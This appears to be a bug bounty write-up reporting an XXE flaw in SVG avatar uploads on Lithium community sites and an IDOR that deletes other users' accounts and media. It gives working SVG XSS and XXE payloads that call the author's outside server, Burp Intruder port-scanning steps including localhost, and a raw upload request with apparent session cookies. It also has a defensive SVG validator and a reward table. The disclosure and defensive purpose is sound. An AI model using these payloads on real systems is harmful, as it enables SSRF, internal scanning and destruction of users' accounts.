Vulnerability 1: XXE in community.{site}.com

There is a feature in the Lithium community platform at community.{site}.com for uploading avatars and images, and it accepts SVG files. When an SVG file (which is XML) is uploaded, the server-side XML parser parses it. This leads to XXE, which can have severe and dangerous effects: an XXE attack lets an attacker scan internal ports and remote server ports, load external DTD files, cause an FTP DoS and more. Below are the ones I was able to prove:

1) Proved causing OOB XXE to my server vps0007.dasaweb.co.uk

2) Proved causing SSRF and port scan

3) Proved causing FTP DoS, as an FTP connection is made to my server vps0007.dasaweb.co.uk

4) Information disclosure (sensitive)

STEP BY STEP POC:

1) Logged in to community.{site}.com

Go to either https://community.{site}.com/t5/media/gallerypage/user-id/61xxxx or https://community.{site}.com/t5/user/myprofilepage/tab/user-icons

Image upload option: https://community.{site}.com/t5/media/gallerypage/user-id/61xxxx

Avatar upload option: https://community.{site}.com/t5/user/myprofilepage/tab/user-icons

2) I tried to upload an SVG file whose source code is below. After uploading the SVG file I could access it publicly, with the XSS executed.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,320 240,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      prompt('paswword please!');
   </script>
</svg>

After executing XSS using the SVG file, my second thought was to try XXE. I embedded the XXE payload below in the SVG file and found that the request reached my server.


3) Upload it via the Browse option of either the add image or the avatar upload.

4) I saw the request on my server, where netcat was listening, coming from ams1-nat.lithium.com.

5) Now change the XML in the SVG file to use FTP:

<?xml version="1.0" ?><!DOCTYPE r [ <!ELEMENT r ANY >
<!ENTITY sp SYSTEM "FTP://vps0007.dasaweb.co.uk:9001/data.xml">
]>
<r>&sp;</r>

6) Upload it and check the request on my server, where netcat is listening, coming from ams1-nat.lithium.com:

listening on [37.59.68.106] 9001 …

connect to [37.59.68.106] from ams1-nat.lithium.com [46.19.168.9] 55535

As FTP is enabled, this will cause an FTP DoS.

6) Now intercept the SVG file upload request in Burp and send it to Intruder.

The request will look like this:

POST /t5/user/myprofilepage.imageuploadeditor:uploadimage?t:ac=tab/user-icons&t:cp=block/propertyeditblocks HTTP/1.1
Host: community.{site}.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Referer: https://community.{site}.com/t5/user/myprofilepage/tab/user-icons
Content-Length: 988
Content-Type: multipart/form-data; boundary=---------------------------39612053628921
Cookie: optimizelyEndUserId=oeu1481831612267r0.5301134228318806; optimizelySegments=%7B%226174980032%22%3A%22referral%22%2C%226176630028%22%3A%22none%22%2C%226179250069%22%3A%22false%22%2C%226161020302%22%3A%22ff%22%7D; optimizelyBuckets=%7B%7D; _ga=GA1.2.856307035.1481831613; LithiumVisitor=~2mlCxJIBDYkI66Wpk~jJhAOVlH9wU3MOi6b0s0_wN3sAvU6am8nS91Ee6z_AFTDxdU4dO7YEIoybEGfdOptsQ6Y_Y8yH4Wt5qwPH-LtQ..; VISITOR_BEACON=~24arMJQ7k9e6Vls0T~1nsUYDVR1GQM3jnxF1qUNHxWE3Ck1CUe_1KwZuhtwQkwlvJoDYp5vshAyMWRzq1ZS26NHKJ9D0gKBoJcK0e2uA..; spot=%7B%22t%22%3A1483096080%2C%22m%22%3A%22us%22%2C%22p%22%3A%22open%22%2C%22w%22%3A%22%22%7D; sp_t=eabead6d001e35c9554cad2abe1f0e90; __tdev=GY64fzC6; fbm_174829003346=base_domain=.{site}.com; plp=e6e94d678d6ebc404cf77d5b7869462cb0a22231; __sonar=18159967670673728347; __gads=ID=42c92ad7292daba4:T=1483096014:S=ALNI_MaaH3lqaYxvUa3TM7DPX46Zz2Qa-w; sp_fi=1; sp_cc=1; sp_last_utm=%7B%22utm_source%22%3A%22{site}_webplayer%22%2C%22utm_medium%22%3A%22growth_conversion%22%2C%22utm_campaign%22%3A%22trial_accountoverview_all%22%2C%22utm_content%22%3A%22all500003%22%7D; __tumi=b7de3a83508bbe9f6412; {site}_market=uk; LiSESSIONID=09254C4F2C5AA57054F5336916B6103C; sp_dc=AQBo0ZT90RSICQpQvQpAJRz3FCjF9kIb6M0cTqxHkI8NdwCL_AsTUoUTQfatyjCizKmAP7cn2StzDcKwexD4jdG1; lithiumLogin:{site}=~2Y1sAQZ4B8FxaQTm4~rjKz7S1r1pjF_kMrSEjjEvkPNRocgqiBxhzDlT4oJHobkcK7egvELv9KoHpfSH-k; LithiumUserInfo=6161419; LithiumUserSecure=55ad1238-fb6a-4ab6-9ada-b23e8298a837; _gat=1
Connection: close

-----------------------------39612053628921
Content-Disposition: form-data; name="anonAction"

true
-----------------------------39612053628921
Content-Disposition: form-data; name="t:ac"

tab/user-icons
-----------------------------39612053628921
Content-Disposition: form-data; name="t:cp"

block/propertyeditblocks
-----------------------------39612053628921
Content-Disposition: form-data; name="Filename"

xxe_svg.svg
-----------------------------39612053628921
Content-Disposition: form-data; name="Filesize"

251
-----------------------------39612053628921
Content-Disposition: form-data; name="Filedata"; filename="xxe_svg.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "FTP:// vps0007.dasaweb.co.uk:§9001§" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
-----------------------------39612053628921--

7) Now fuzz the port; here it is 9001 in FTP:// vps0007.dasaweb.co.uk:§9001§"

Fuzz it from 20 to 90 in Intruder and remember to set the number of threads in Intruder to 1. I have ports 80, 22 and 23 open.

You can see below that ports 22, 23 and 80 time out, which means they are open.

Now for the internal localhost put 127.0.0.1:{port}. As soon as you put 127.0.0.1:{port} it starts scanning its own system, disclosing the open ports on the hosting system.
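As an added defensive example (not code from the original post or from Lithium), here is a Python validator an avatar or image upload endpoint could run before handing an SVG to its XML parser. It rejects both payload types shown above: any DOCTYPE, which is the only place the entity behind the OOB and FTP callbacks can be declared, and <script> elements or on* attributes, which carried the XSS. The sample SVGs are constructed here and use the placeholder host attacker.example.

```python
import xml.parsers.expat

SVG_NS = "http://www.w3.org/2000/svg"
ACTIVE_ELEMENTS = {"script", "foreignObject"}  # let an SVG run code in the viewer's browser


class UnsafeSvg(Exception):
    """Raised when an uploaded SVG carries a DOCTYPE or active content."""


def validate_svg(data: bytes) -> bool:
    """Return True for a plain SVG; raise UnsafeSvg on XXE or XSS constructs."""
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")  # names arrive as "<uri> <local>"
    seen_root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Entities can only be declared inside a DOCTYPE, so refusing every
        # DOCTYPE (PUBLIC, SYSTEM or internal subset) removes the XXE surface.
        raise UnsafeSvg("DOCTYPE declaration not allowed in uploads")

    def on_start(name, attrs):
        ns, _, local = name.rpartition(" ")
        if not seen_root:
            seen_root.append(name)
            if (ns, local) != (SVG_NS, "svg"):
                raise UnsafeSvg("root element is not an SVG <svg>")
        if local in ACTIVE_ELEMENTS:
            raise UnsafeSvg(f"active element <{local}> not allowed")
        for attr in attrs:  # onload=, onclick=, ... are script hooks too
            if attr.rpartition(" ")[2].lower().startswith("on"):
                raise UnsafeSvg(f"event handler attribute {attr!r} not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        # An &entity; reference without a DOCTYPE ends up here as "undefined entity"
        raise UnsafeSvg(f"malformed XML: {exc}") from exc
    return True


def is_safe_svg(data: bytes) -> bool:
    try:
        return validate_svg(data)
    except UnsafeSvg:
        return False


# Constructed samples modelled on the post's payloads; attacker.example is a placeholder host
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,320 240,0"/></svg>'
XSS_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("hi")</script></svg>'
XXE_SVG = b'<!DOCTYPE x [ <!ENTITY xxe SYSTEM "ftp://attacker.example:9001/"> ]><svg xmlns="http://www.w3.org/2000/svg">&xxe;</svg>'
```

Rejecting the DOCTYPE up front means the parser never reaches the SYSTEM identifier, so no DNS lookup or outbound FTP/HTTP connection is ever attempted; this is the check that would have stopped every step in the PoC above.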


Vulnerability 2: IDOR to delete any user's community account, any video, any image

There is a feature through which you can delete any Lithium account. You can close your account. After you close your account, you can't re-open it. When your account is closed, all kudos, accepted solutions, posts, friends and achievements will be permanently deleted. If you later decide to re-join the community, you must re-register and start from scratch. Closing your account will immediately log you out.

In this IDOR, when the user ID is changed to the victim's user ID, the victim's account gets deleted after the request is processed. This happens because the application does not validate the user ID against the account holder of the current session. As a result, when the user ID is changed to the victim's ID, the victim's account gets deleted.

Similarly, for deleting a user's videos and images the application uses the user ID, and the same logic can be used to delete the videos and images of other users.

Rewards and recognition:

Company            Sites             Award & Recog
spotify            community sites   4000$
ING Bank           Many sites        600$
Paypal             Community sites   500$
Ubiquity Network   Community         1500$
AT&T               Sites             1500$
